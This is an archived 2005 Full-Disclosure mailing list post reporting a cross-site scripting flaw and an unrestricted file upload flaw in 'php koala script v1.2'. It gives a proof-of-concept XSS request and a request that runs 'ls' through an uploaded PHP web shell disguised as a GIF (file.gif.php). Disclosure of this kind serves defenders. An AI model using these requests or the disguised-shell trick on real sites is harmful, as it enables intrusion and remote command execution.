[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] xss in php koala script v1.2

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] xss in php koala script v1.2
From: shieldmaiden333@xxxxxxx
Date: Fri, 14 Oct 2005 18:11:48 -0400

xss
/info.php?user=<xss>
 
and an upload vulnerability if you upload a file named file.gif.php
/upload/file.gif.php?cmd=ls
 
file.gif.php is attached

Attachment: file.gif.php
Description: GIF image

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] MDKSA-2005:185 - Updated koffice packages fix KWord RTF import overflow vulnerability
Next by Date: Re: [Full-disclosure] IMLogic telling porkies about Yahoo
Previous by thread: [Full-disclosure] MDKSA-2005:185 - Updated koffice packages fix KWord RTF import overflow vulnerability
Next by thread: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 31
Index(es):
- Date
- Thread